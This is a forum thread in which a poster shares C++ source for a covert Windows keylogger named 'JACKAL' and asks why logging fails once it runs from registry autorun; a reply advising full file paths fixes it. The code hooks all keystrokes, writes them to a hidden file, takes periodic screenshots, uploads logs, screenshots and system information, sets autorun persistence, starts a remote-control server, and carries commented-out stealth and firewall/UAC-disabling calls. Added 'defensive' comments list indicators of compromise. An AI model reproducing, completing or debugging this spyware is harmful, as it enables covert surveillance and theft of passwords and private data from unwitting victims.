-
Keylogger problem
I have the source code below, and it works perfectly when I run it with a double click. It captures keystrokes and takes a screenshot for every 100 keystrokes, and it can be controlled remotely from another computer.
The problem is that when it is added to the registry by calling the SetAutorunEnable("JACKAL",true) function, it starts and captures keystrokes and everything, but it doesn't write to the "work.n6" file and it doesn't increment the pressed and photo_contor values. And I don't know why! Please help! I know that something is wrong in KeyboardEvent or JACKAL, but I don't know what. Everything else works just fine!
#include "NZT.h"
/*
 * Keyboard hook callback; JACKAL registers it with SetWindowsHookEx as a
 * WH_KEYBOARD_LL procedure. On each key-down event it appends the key to
 * "work.n6". Once more than 100 keys have been counted it passes the log and
 * a freshly taken screenshot to uploadFile(). The event is always forwarded
 * with CallNextHookEx.
 *
 * f and hKeyboardHook are not declared in this listing; presumably they are
 * globals from NZT.h. hide_file, uploadFile, ScreenShot and wide_to_utf8 are
 * helpers whose bodies are not shown.
 *
 * Reviewer note (defensive): the on-disk names visible here -- work.n6,
 * data.n6 and decimal-numbered "<n>.jpeg" files -- together with the autorun
 * name "JACKAL" used in wmain are the indicators this page provides for
 * triage of an affected host.
 */
LRESULT WINAPI KeyboardEvent (int nCode, WPARAM wParam, LPARAM lParam)
{
// Runs on every invocation of the callback, not only on key-down events.
// The name is relative, so where the file lands depends on the process's
// current directory (the replies in this thread settle on full paths).
f = fopen("work.n6","a+");
wchar_t photo_name[MAX_PATH];
char * use;
LPWSTR convert;
// Only key-down messages delivered with HC_ACTION are recorded.
if ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
{
// Function-level statics: both counters persist across calls.
static int pressed = 0;
static int photo_contor = 0;
f = fopen("work.n6","a+");
// Local copy of the hook structure that lParam points to.
KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);
// Packs the scan code (shifted by 16) and the flags (shifted by 24) into the
// value handed to GetKeyNameText.
DWORD dwMsg = 1;
dwMsg += hooked_key.scanCode << 0x10;
dwMsg += hooked_key.flags << 0x18;
// Builds a bracketed key name, "[name]"; i is the index just past the name.
char lpszKeyName[0x400] = {0};
lpszKeyName[0] = '[';
int i = GetKeyNameText(dwMsg, (lpszKeyName + 1),0xFF) + 1;
int key = hooked_key.vkCode;
lpszKeyName[i] = ']';
//Gamma Border
// Virtual-key codes 'A'..'Z' are written as a single character; every other
// key is written as its bracketed name.
if (key >= 'A' && key <= 'Z')
{
// GetAsyncKeyState >= 0 means SHIFT is not held: add 0x20 for lower case.
if (GetAsyncKeyState(VK_SHIFT)>= 0) key += 0x20;
// The NULL check guards only the fprintf; the counter below is incremented
// whether or not the file could be opened.
if (f!=NULL)
fprintf(f,"%c", key);
pressed += 1;
}
else
{
if (f != NULL)
fprintf(f,"%s", lpszKeyName);
pressed += 1;
}
// hide_file is not shown; presumably it marks the file hidden -- confirm
// against NZT.h.
hide_file("work.n6");
hide_file("data.n6");
// After more than 100 counted keys: send the log, take and send a screenshot.
if (pressed > 100 /*&& connection_possible*/)
{
fclose(f);
uploadFile("work.n6","work.txt");
// Screenshot file name is the decimal counter plus ".jpeg" (radix 0xA = 10).
_itow(photo_contor,photo_name,0xA);
convert = wcscat(photo_name,L".jpeg");
// Second argument 50 is presumably an image-quality setting -- confirm.
ScreenShot(convert,50);
use = wide_to_utf8(convert);
uploadFile(use,use);
hide_file(use);
// Removes the previous screenshot, so at most the latest one stays on disk.
if (photo_contor > 0)
{
_itow(photo_contor - 1,photo_name,0xA);
convert = wcscat(photo_name,L".jpeg");
DeleteFile(wide_to_utf8(convert));
}
pressed = 0;
photo_contor ++;
}
fclose(f);
}
// The event is always passed on to the next hook in the chain.
return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
}
/*
 * Thread procedure (started from wmain via CreateThread). Installs
 * KeyboardEvent as a WH_KEYBOARD_LL hook, pumps messages until GetMessage
 * returns 0, then removes the hook and returns 0. lpParm is unused.
 *
 * hKeyboardHook is not declared in this listing; presumably a global from
 * NZT.h.
 *
 * Reviewer note (defensive): the SetWindowsHookEx call with WH_KEYBOARD_LL is
 * the point at which keyboard capture becomes visible to API-level endpoint
 * telemetry.
 */
DWORD WINAPI JACKAL(LPVOID lpParm)
{
HINSTANCE hins;
// Module handle of the current process's executable.
hins = GetModuleHandle(NULL);
// Thread id 0: the hook is not tied to one specific thread.
hKeyboardHook = SetWindowsHookEx ( WH_KEYBOARD_LL, (HOOKPROC) KeyboardEvent, hins, 0);
MSG message;
// The installing thread runs a message loop for as long as the hook is in place.
while (GetMessage(&message,NULL,0,0))
{
TranslateMessage( &message );
DispatchMessage( &message );
}
UnhookWindowsHookEx(hKeyboardHook);
return 0;
}
/*
 * Program entry point. In order: calls auto_hide(), enables an autorun entry
 * named "JACKAL", initialises Winsock (version word 0x0101), collects, writes
 * and uploads computer information, then starts two threads -- createServer
 * and JACKAL -- and blocks until both have finished.
 *
 * auto_hide, SetAutorunEnable, getComputerInfo, writeComputerInfo,
 * uploadComputerInfo and createServer are helpers not shown here; tasks and
 * wsdata are presumably globals from NZT.h.
 *
 * Reviewer note (defensive): each behaviour visible in this function leaves
 * its own trace. The autorun entry (the post says it is written to the
 * registry) shows up in persistence audits, the createServer thread and the
 * uploads show up in host network logs, and the keyboard hook is installed in
 * JACKAL.
 */
void wmain()
{
//stealth();
//disable_firewall_UAC();
auto_hide();
// Registers the program to start automatically under the name "JACKAL".
SetAutorunEnable("JACKAL",true);
WSAStartup(0x0101,&wsdata);
getComputerInfo();
writeComputerInfo();
uploadComputerInfo();
// tasks[0]: createServer (the post describes remote control from another computer).
tasks[0] = CreateThread( NULL, 0,
(LPTHREAD_START_ROUTINE)createServer, NULL, 0, NULL);
// tasks[1]: the keyboard-hook thread.
tasks[1] = CreateThread( NULL, 0,
(LPTHREAD_START_ROUTINE)JACKAL,NULL, 0, NULL);
// TRUE + INFINITE: waits with no timeout until both threads have exited.
WaitForMultipleObjects(2, tasks, TRUE, INFINITE );
WSACleanup();
}
-
Re: Keylogger problem
You should always use full path names rather than relative ones.
-
Re: Keylogger problem
Yes VictorN, I will take that into consideration. Thanks!
-
Re: Keylogger problem
Man, you are a genius! It works, thanks!
I've replaced "work.n6" with the full file path!